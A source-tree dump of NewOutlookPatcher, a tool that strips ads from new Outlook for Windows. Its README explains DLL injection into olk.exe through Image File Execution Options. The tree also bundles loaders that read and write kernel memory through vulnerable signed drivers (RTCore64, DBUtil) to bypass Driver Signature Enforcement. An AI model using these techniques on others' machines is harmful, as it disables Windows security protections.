├── NOP ├── loader2 │ ├── 16.ico │ ├── 32.ico │ ├── msvcrt.lib │ ├── resource.h │ ├── DSE-Patcher.rc │ ├── pstdint.h │ ├── MyDialog1.h │ ├── DSE-Patcher.exe.manifest │ ├── RTCore64.h │ ├── DBUtil.h │ ├── DSE-Patcher.vcxproj.filters │ ├── hde64.h │ ├── table64.h │ ├── MyFunctions.h │ ├── DSE-Patcher.vcxproj │ ├── hde64.c │ └── MyDialog1.cpp ├── worker │ ├── packages.config │ ├── worker.vcxproj.filters │ ├── worker.vcxproj │ └── dllmain.cpp ├── installer │ ├── installer.vcxproj.filters │ ├── installer.inf │ ├── Driver.c │ └── installer.vcxproj └── gui │ ├── gui.csproj │ ├── Form1.resx │ ├── Program.cs │ └── Form1.Designer.cs ├── .github └── FUNDING.yml ├── GDRVLoader.vcxproj.user ├── binary └── dropper.h ├── GDRVLoader.cpp ├── GDRVLoader.vcxproj.filters ├── .gitattributes ├── hde ├── hde64.h ├── table64.h └── hde64.c ├── README.md ├── NOP.sln ├── GDRVLoader.vcxproj ├── global.h ├── exploit ├── pe.cpp └── swind2.cpp └── .gitignore /NOP/loader2/16.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/16.ico -------------------------------------------------------------------------------- /NOP/loader2/32.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/32.ico -------------------------------------------------------------------------------- /NOP/loader2/msvcrt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/msvcrt.lib -------------------------------------------------------------------------------- /NOP/loader2/resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/resource.h 
-------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/DSE-Patcher.rc -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | custom: ['https://www.paypal.com/donate?business=valentingabrielradu%40gmail.com&no_recurring=0&item_name=NewOutlookPatcher'] 2 | -------------------------------------------------------------------------------- /GDRVLoader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /NOP/loader2/pstdint.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _PSTDINT 3 | #define _PSTDINT 4 | 5 | #include 6 | 7 | // integer types for Hacker Disassembler Engine 64 (HDE) 8 | typedef UINT8 uint8_t; 9 | typedef UINT16 uint16_t; 10 | typedef UINT32 uint32_t; 11 | typedef UINT64 uint64_t; 12 | 13 | #endif // _PSTDINT 14 | 15 | -------------------------------------------------------------------------------- /NOP/worker/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /binary/dropper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "bytes.h" 3 | 4 | bool DropDriverFromBytes(const wchar_t* path) 5 | { 6 | HANDLE h_file; 7 | BOOLEAN b_status = FALSE; 8 | DWORD byte = 0; 9 | 10 | h_file = CreateFileW(path, GENERIC_ALL, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL); 11 | if (GetLastError() == ERROR_FILE_EXISTS) 12 | return 
true; 13 | 14 | if (h_file == INVALID_HANDLE_VALUE) 15 | return false; 16 | 17 | b_status = WriteFile(h_file, shell_mapper, sizeof(shell_mapper), &byte, nullptr); 18 | CloseHandle(h_file); 19 | 20 | if (!b_status) 21 | return false; 22 | 23 | return true; 24 | } 25 | -------------------------------------------------------------------------------- /NOP/loader2/MyDialog1.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 
19 | 20 | #ifndef _MYDIALOG1 21 | #define _MYDIALOG1 22 | 23 | int MyDlg1EnableControls(unsigned char ucEnable); 24 | 25 | #endif // _MYDIALOG1 26 | 27 | -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.exe.manifest: -------------------------------------------------------------------------------- 1 | Patch DSE (Driver Signature Enforcement)true -------------------------------------------------------------------------------- /NOP/worker/worker.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /GDRVLoader.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | #include "binary/dropper.h" 3 | 4 | #define CUSTOM_DRIVER L"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" 5 | 6 | int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { 7 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 8 | { 9 | //if (DropDriverFromBytes(DriverPath)) 10 | { 11 | Status = WindLoadDriver((PWCHAR)L"", (PWCHAR)CUSTOM_DRIVER, FALSE); 12 | 13 | if (NT_SUCCESS(Status)) 14 | printf("Driver loaded successfully\n"); 15 | } 16 | } 17 | { 18 | // Unload driver 19 | Status 
= WindUnloadDriver((PWCHAR)CUSTOM_DRIVER, 0); 20 | if (NT_SUCCESS(Status)) 21 | printf("Driver unloaded successfully\n"); 22 | } 23 | if (!NT_SUCCESS(Status)) 24 | printf("Error: %08X\n", Status); 25 | return true; 26 | } 27 | -------------------------------------------------------------------------------- /NOP/loader2/RTCore64.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 
19 | 20 | #ifndef _RTCORE64 21 | #define _RTCORE64 22 | 23 | #include 24 | 25 | // function exports 26 | int MyRTCore64OpenDevice(char *szDriverFile,HANDLE *hDevice); 27 | int MyRTCore64ReadMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD *dwValue); 28 | int MyRTCore64WriteMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD dwValue); 29 | // binary driver export 30 | extern BYTE RTCore64Driver[14024]; 31 | 32 | #endif // _RTCORE64 33 | 34 | -------------------------------------------------------------------------------- /NOP/installer/installer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Driver Files 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | -------------------------------------------------------------------------------- /NOP/gui/gui.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | WinExe 5 | net8.0-windows 6 | win-x64 7 | enable 8 | true 9 | enable 10 | true 11 | NewOutlookPatcher 12 | 2024.06.24.03 13 | 2024.06.24.03 14 | https://github.com/valinet/NewOutlookPatcher 15 | Copyright 2024 VALINET Solutions. All rights reserved. 16 | Disable ads and product placement in the new Outlook for Windows app. 
17 | 2024.06.24.03 18 | true 19 | NewOutlookPatcher 20 | NewOutlookPatcher 21 | VALINET Solutions SRL 22 | NewOutlookPatcher 23 | True 24 | NewOutlookPatcher 25 | NewOutlookPatcher 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /NOP/loader2/DBUtil.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 
19 | 20 | #ifndef _DBUTIL 21 | #define _DBUTIL 22 | 23 | #include 24 | 25 | // function exports 26 | int MyDBUtilOpenDevice(char *szDriverFile,HANDLE *hDevice); 27 | int MyDBUtilReadMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD *dwValue); 28 | int MyDBUtilWriteMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD dwValue); 29 | // binary driver exports 30 | extern BYTE DBUtil_v23_sys[14840]; 31 | extern BYTE DBUtil_v25_sys[24952]; 32 | extern BYTE DBUtil_v25_inf[2204]; 33 | extern BYTE DBUtil_v25_cat[10065]; 34 | extern BYTE DBUtil_v26_sys[27896]; 35 | extern BYTE DBUtil_v26_inf[2333]; 36 | extern BYTE DBUtil_v26_cat[10072]; 37 | extern BYTE DBUtil_v27_sys[24968]; 38 | extern BYTE DBUtil_v27_inf[2499]; 39 | extern BYTE DBUtil_v27_cat[10358]; 40 | extern BYTE DBUtil_v27_WdfCI[1730168]; 41 | 42 | #endif // _DBUTIL 43 | 44 | -------------------------------------------------------------------------------- /GDRVLoader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {642f4797-7b5e-46b2-b5bf-d27522e70bd4} 6 | 7 | 8 | {6c1f4902-8567-466b-aa97-8983f2a2a1b0} 9 | 10 | 11 | {bd3d2744-d845-40dc-8b16-fd416ca97bc0} 12 | 13 | 14 | {7ef1f0a2-f1f9-4a60-97e9-36fdb55f080b} 15 | 16 | 17 | 18 | 19 | 20 | Exploit 21 | 22 | 23 | Hde 24 | 25 | 26 | Exploit 27 | 28 | 29 | 30 | 31 | Binary 32 | 33 | 34 | Binary 35 | 36 | 37 | Hde 38 | 39 | 40 | Hde 41 | 42 | 43 | Utils 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /NOP/installer/installer.inf: -------------------------------------------------------------------------------- 1 | ; 2 | ; installer.inf 3 | ; 4 | 5 | [Version] 6 | Signature="$WINDOWS NT$" 7 | Class=System ; TODO: specify appropriate Class 8 | ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid 9 | Provider=%ManufacturerName% 10 | CatalogFile=installer.cat 11 | DriverVer= ; TODO: set DriverVer in 
stampinf property pages 12 | PnpLockdown=1 13 | 14 | [DestinationDirs] 15 | DefaultDestDir = 12 16 | installer_Device_CoInstaller_CopyFiles = 11 17 | 18 | [SourceDisksNames] 19 | 1 = %DiskName%,,,"" 20 | 21 | [SourceDisksFiles] 22 | installer.sys = 1,, 23 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames 24 | 25 | ;***************************************** 26 | ; Install Section 27 | ;***************************************** 28 | 29 | [Manufacturer] 30 | %ManufacturerName%=Standard,NT$ARCH$ 31 | 32 | [Standard.NT$ARCH$] 33 | %installer.DeviceDesc%=installer_Device, Root\installer ; TODO: edit hw-id 34 | 35 | [installer_Device.NT] 36 | CopyFiles=Drivers_Dir 37 | 38 | [Drivers_Dir] 39 | installer.sys 40 | 41 | ;-------------- Service installation 42 | [installer_Device.NT.Services] 43 | AddService = installer,%SPSVCINST_ASSOCSERVICE%, installer_Service_Inst 44 | 45 | ; -------------- installer driver install sections 46 | [installer_Service_Inst] 47 | DisplayName = %installer.SVCDESC% 48 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER 49 | StartType = 3 ; SERVICE_DEMAND_START 50 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL 51 | ServiceBinary = %12%\installer.sys 52 | 53 | ; 54 | ;--- installer_Device Coinstaller installation ------ 55 | ; 56 | 57 | [installer_Device.NT.CoInstallers] 58 | AddReg=installer_Device_CoInstaller_AddReg 59 | CopyFiles=installer_Device_CoInstaller_CopyFiles 60 | 61 | [installer_Device_CoInstaller_AddReg] 62 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller" 63 | 64 | [installer_Device_CoInstaller_CopyFiles] 65 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll 66 | 67 | [installer_Device.NT.Wdf] 68 | KmdfService = installer, installer_wdfsect 69 | [installer_wdfsect] 70 | KmdfLibraryVersion = $KMDFVERSION$ 71 | 72 | [Strings] 73 | SPSVCINST_ASSOCSERVICE= 0x00000002 74 | ManufacturerName="" ;TODO: Replace with your manufacturer name 75 | DiskName = "installer 
Installation Disk" 76 | installer.DeviceDesc = "installer Device" 77 | installer.SVCDESC = "installer Service" 78 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. 
To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | Header Files 55 | 56 | 57 | Header Files 58 | 59 | 60 | 61 | 62 | Resource Files 63 | 64 | 65 | 66 | 67 | Resource Files 68 | 69 | 70 | Resource Files 71 | 72 | 73 | 74 | 75 | Resource Files 76 | 77 | 78 | -------------------------------------------------------------------------------- /NOP/loader2/hde64.h: -------------------------------------------------------------------------------- 1 | 2 | // Hacker Disassembler Engine 64 3 | // Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | // All rights reserved. 
5 | // 6 | // hde64.h: C/C++ header file 7 | // 8 | 9 | #ifndef _HDE64_H_ 10 | #define _HDE64_H_ 11 | 12 | // stdint.h - C99 standard header 13 | // http://en.wikipedia.org/wiki/stdint.h 14 | // 15 | // if your compiler doesn't contain "stdint.h" header (for 16 | // example, Microsoft Visual C++), you can download file: 17 | // http://www.azillionmonkeys.com/qed/pstdint.h 18 | // and change next line to: 19 | // #include "pstdint.h" 20 | // 21 | #include "pstdint.h" 22 | 23 | #define F_MODRM 0x00000001 24 | #define F_SIB 0x00000002 25 | #define F_IMM8 0x00000004 26 | #define F_IMM16 0x00000008 27 | #define F_IMM32 0x00000010 28 | #define F_IMM64 0x00000020 29 | #define F_DISP8 0x00000040 30 | #define F_DISP16 0x00000080 31 | #define F_DISP32 0x00000100 32 | #define F_RELATIVE 0x00000200 33 | #define F_ERROR 0x00001000 34 | #define F_ERROR_OPCODE 0x00002000 35 | #define F_ERROR_LENGTH 0x00004000 36 | #define F_ERROR_LOCK 0x00008000 37 | #define F_ERROR_OPERAND 0x00010000 38 | #define F_PREFIX_REPNZ 0x01000000 39 | #define F_PREFIX_REPX 0x02000000 40 | #define F_PREFIX_REP 0x03000000 41 | #define F_PREFIX_66 0x04000000 42 | #define F_PREFIX_67 0x08000000 43 | #define F_PREFIX_LOCK 0x10000000 44 | #define F_PREFIX_SEG 0x20000000 45 | #define F_PREFIX_REX 0x40000000 46 | #define F_PREFIX_ANY 0x7f000000 47 | 48 | #define PREFIX_SEGMENT_CS 0x2e 49 | #define PREFIX_SEGMENT_SS 0x36 50 | #define PREFIX_SEGMENT_DS 0x3e 51 | #define PREFIX_SEGMENT_ES 0x26 52 | #define PREFIX_SEGMENT_FS 0x64 53 | #define PREFIX_SEGMENT_GS 0x65 54 | #define PREFIX_LOCK 0xf0 55 | #define PREFIX_REPNZ 0xf2 56 | #define PREFIX_REPX 0xf3 57 | #define PREFIX_OPERAND_SIZE 0x66 58 | #define PREFIX_ADDRESS_SIZE 0x67 59 | 60 | #pragma pack(push,1) 61 | 62 | typedef struct { 63 | uint8_t len; 64 | uint8_t p_rep; 65 | uint8_t p_lock; 66 | uint8_t p_seg; 67 | uint8_t p_66; 68 | uint8_t p_67; 69 | uint8_t rex; 70 | uint8_t rex_w; 71 | uint8_t rex_r; 72 | uint8_t rex_x; 73 | uint8_t rex_b; 74 | uint8_t 
opcode; 75 | uint8_t opcode2; 76 | uint8_t modrm; 77 | uint8_t modrm_mod; 78 | uint8_t modrm_reg; 79 | uint8_t modrm_rm; 80 | uint8_t sib; 81 | uint8_t sib_scale; 82 | uint8_t sib_index; 83 | uint8_t sib_base; 84 | union { 85 | uint8_t imm8; 86 | uint16_t imm16; 87 | uint32_t imm32; 88 | uint64_t imm64; 89 | } imm; 90 | union { 91 | uint8_t disp8; 92 | uint16_t disp16; 93 | uint32_t disp32; 94 | } disp; 95 | uint32_t flags; 96 | } hde64s; 97 | 98 | #pragma pack(pop) 99 | 100 | #ifdef __cplusplus 101 | extern "C" { 102 | #endif 103 | 104 | // __cdecl 105 | unsigned int hde64_disasm(const void *code, hde64s *hs); 106 | 107 | #ifdef __cplusplus 108 | } 109 | #endif 110 | 111 | #endif // _HDE64_H_ 112 | 113 | -------------------------------------------------------------------------------- /hde/hde64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 
5 | * 6 | * hde64.h: C/C++ header file 7 | * 8 | */ 9 | 10 | #ifndef _HDE64_H_ 11 | #define _HDE64_H_ 12 | 13 | /* stdint.h - C99 standard header 14 | * http://en.wikipedia.org/wiki/stdint.h 15 | * 16 | * if your compiler doesn't contain "stdint.h" header (for 17 | * example, Microsoft Visual C++), you can download file: 18 | * http://www.azillionmonkeys.com/qed/pstdint.h 19 | * and change next line to: 20 | * #include "pstdint.h" 21 | */ 22 | #include 23 | 24 | #define F_MODRM 0x00000001 25 | #define F_SIB 0x00000002 26 | #define F_IMM8 0x00000004 27 | #define F_IMM16 0x00000008 28 | #define F_IMM32 0x00000010 29 | #define F_IMM64 0x00000020 30 | #define F_DISP8 0x00000040 31 | #define F_DISP16 0x00000080 32 | #define F_DISP32 0x00000100 33 | #define F_RELATIVE 0x00000200 34 | #define F_ERROR 0x00001000 35 | #define F_ERROR_OPCODE 0x00002000 36 | #define F_ERROR_LENGTH 0x00004000 37 | #define F_ERROR_LOCK 0x00008000 38 | #define F_ERROR_OPERAND 0x00010000 39 | #define F_PREFIX_REPNZ 0x01000000 40 | #define F_PREFIX_REPX 0x02000000 41 | #define F_PREFIX_REP 0x03000000 42 | #define F_PREFIX_66 0x04000000 43 | #define F_PREFIX_67 0x08000000 44 | #define F_PREFIX_LOCK 0x10000000 45 | #define F_PREFIX_SEG 0x20000000 46 | #define F_PREFIX_REX 0x40000000 47 | #define F_PREFIX_ANY 0x7f000000 48 | 49 | #define PREFIX_SEGMENT_CS 0x2e 50 | #define PREFIX_SEGMENT_SS 0x36 51 | #define PREFIX_SEGMENT_DS 0x3e 52 | #define PREFIX_SEGMENT_ES 0x26 53 | #define PREFIX_SEGMENT_FS 0x64 54 | #define PREFIX_SEGMENT_GS 0x65 55 | #define PREFIX_LOCK 0xf0 56 | #define PREFIX_REPNZ 0xf2 57 | #define PREFIX_REPX 0xf3 58 | #define PREFIX_OPERAND_SIZE 0x66 59 | #define PREFIX_ADDRESS_SIZE 0x67 60 | 61 | #pragma pack(push,1) 62 | 63 | typedef struct { 64 | uint8_t len; 65 | uint8_t p_rep; 66 | uint8_t p_lock; 67 | uint8_t p_seg; 68 | uint8_t p_66; 69 | uint8_t p_67; 70 | uint8_t rex; 71 | uint8_t rex_w; 72 | uint8_t rex_r; 73 | uint8_t rex_x; 74 | uint8_t rex_b; 75 | uint8_t opcode; 76 | 
uint8_t opcode2; 77 | uint8_t modrm; 78 | uint8_t modrm_mod; 79 | uint8_t modrm_reg; 80 | uint8_t modrm_rm; 81 | uint8_t sib; 82 | uint8_t sib_scale; 83 | uint8_t sib_index; 84 | uint8_t sib_base; 85 | union { 86 | uint8_t imm8; 87 | uint16_t imm16; 88 | uint32_t imm32; 89 | uint64_t imm64; 90 | } imm; 91 | union { 92 | uint8_t disp8; 93 | uint16_t disp16; 94 | uint32_t disp32; 95 | } disp; 96 | uint32_t flags; 97 | } hde64s; 98 | 99 | #pragma pack(pop) 100 | 101 | #ifdef __cplusplus 102 | extern "C" { 103 | #endif 104 | 105 | /* __cdecl */ 106 | unsigned int hde64_disasm(const void *code, hde64s *hs); 107 | 108 | #ifdef __cplusplus 109 | } 110 | #endif 111 | 112 | #endif /* _HDE64_H_ */ 113 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

NewOutlookPatcher

2 | Join on Discord 3 |

Disable ads and product placement in the new Outlook for Windows app.

4 |

Tested on:

5 |
    6 |
  • Windows 10 Version 21H2 (OS Build 19044.4046)
  • 7 |
  • Windows 11 Version 23H2 (OS Build 22621.3296)
  • 8 |
9 |

Donate

10 |

PayPal donations

11 |

Features

12 |
    13 |
  • Disable ad as first item in e-mails list
  • 14 |
  • Disable lower left corner OneDrive banner
  • 15 |
  • Disable Word, Excel, PowerPoint, To Do, OneDrive, More apps icons
  • 16 |
  • Enable F12 Developer Tools
  • 17 |
18 |
19 | Product image 20 |
21 |

How to?

22 |
    23 |
  1. Download the latest release.
  2. 24 |
  3. Run NewOutlookPatcher. Outlook will also open automatically in the background.
  4. 25 |
  5. Customize the configuration by checking/unchecking individual items.
  6. 26 |
  7. Press Install. The application will elevate itself, close Outlook, apply your settings and restart Outlook for you.
  8. 27 |
28 |

Why is elevation required?

29 | The patcher requires administrative access in order to perform the following operations: 30 |
    31 |
  • Installing the patcher (NewOutlookPatcher.dll) in C:\Windows\System32\ which is write-protected for regular users.
  • 32 |
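  • Configuring New Outlook for Windows to load the patcher when it starts up, using the registry (in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\olk.exe). Endpoint security products commonly monitor changes under Image File Execution Options, so this step may be reported by them.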
  • 33 |
34 |

Uninstalling

35 |

Run NewOutlookPatcher and press the Uninstall button. Done.

36 |

Known issues

37 | 41 |

How does it work?

42 |
    43 |
  • Everything is packed together in a tiny .NET 8-based executable. Required resources are extracted to a temporary folder at runtime.
  • 44 |
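  • New Outlook (olk.exe) is patched using a DLL that is injected into its process. The DLL is loaded using the AppVerifier infrastructure, which is what the Image File Execution Options entry for olk.exe configures. The project contains a very clean C++ implementation of this technique. This works because olk.exe does not run as a protected process, so it is able to load unsigned code; the injected DLL then runs with the same privileges and data access as Outlook itself.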
  • 45 |
  • The actual patching is done by hooking WebView2 methods, in order to execute scripts that alter the CSS once the main interface loads.
  • 46 |
47 |

Solution structure

48 |

The Visual Studio solution is divided into 5 projects:

49 |
    50 |
  • gui: Contains user interface and unpacker logic, C# .NET 8.
  • 51 |
  • worker: Module loaded by Outlook that injects custom JavaScript and CSS into the user interface.
  • 52 |
53 |

Successful compilation is only possible for x64 at the moment. Files packed into the final executable are always taken from the Release folder, so keep this in mind when building in Debug.

54 | -------------------------------------------------------------------------------- /NOP/loader2/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 